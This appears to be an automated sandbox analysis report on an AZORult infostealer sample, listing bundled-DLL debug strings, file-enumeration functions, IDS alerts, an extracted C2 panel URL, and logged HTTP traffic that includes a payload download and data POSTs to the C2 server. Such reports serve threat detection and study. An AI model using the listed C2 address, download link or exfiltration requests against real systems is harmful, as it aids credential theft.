Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.472715273.000000001F9A0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.12.dr
Source:	Binary string: vcruntime140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.12.dr

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0041006C FindFirstFileW,FindFirstFileW,	12_2_0041006C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00414808 FindFirstFileW,	12_2_00414808
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	12_2_00413030
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_004099C0 FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,	12_2_004099C0
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040A9E4 FindFirstFileW,FindNextFileW,	12_2_0040A9E4
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040D988 FindFirstFileW,FindFirstFileW,	12_2_0040D988
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	12_2_004119AC
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00414A90 FindFirstFileW,FindFirstFileW,	12_2_00414A90
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040FB40 FindFirstFileW,	12_2_0040FB40
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	12_2_00412D6C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00414DE8 FindFirstFileW,FindNextFileW,	12_2_00414DE8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	12_2_0041160C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00409EF0 FindFirstFileW,GetFileAttributesW,	12_2_00409EF0
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	12_2_00413F58
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040F7A8 FindFirstFileW,FindNextFileW,	12_2_0040F7A8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00410064 FindFirstFileW,FindFirstFileW,	12_2_00410064
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00410068 FindFirstFileW,FindFirstFileW,	12_2_00410068
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040A9E3 FindFirstFileW,FindNextFileW,	12_2_0040A9E3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	12_2_004119A8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040DB00 FindFirstFileW,	12_2_0040DB00
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040DB30 FindFirstFileW,	12_2_0040DB30
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00412D40 FindFirstFileW,FindNextFileW,FindClose,	12_2_00412D40
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00412D48 FindFirstFileW,FindNextFileW,FindClose,	12_2_00412D48
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00412D54 FindFirstFileW,FindNextFileW,FindClose,	12_2_00412D54
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	12_2_00413F58
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00409EE8 FindFirstFileW,GetFileAttributesW,	12_2_00409EE8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040F798 FindFirstFileW,FindNextFileW,	12_2_0040F798
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040F7A0 FindFirstFileW,FindNextFileW,	12_2_0040F7A0
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_1_004148A0 __vbaStrCopy,__vbaStrCopy,__vbaStrCopy,__vbaRedim,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,FindFirstFileW,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaFreeStr,__vbaFreeStr,__vbaFreeStr,__vbaAryDestruct,	12_1_004148A0
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_1_00414DD0 __vbaChkstk,__vbaOnError,FindFirstFileW,	12_1_00414DD0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49789 -> 185.29.11.112:80
Source: Traffic	Snort IDS: 2029141 ET TROJAN AZORult v3.2 Server Response M3 185.29.11.112:80 -> 192.168.2.3:49789

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.29.11.112/rothchildnew/Panel/index.php

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DATACLUB-NL DATACLUB-NL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-b4-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K
Source: global traffic	HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 73426Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.11.112
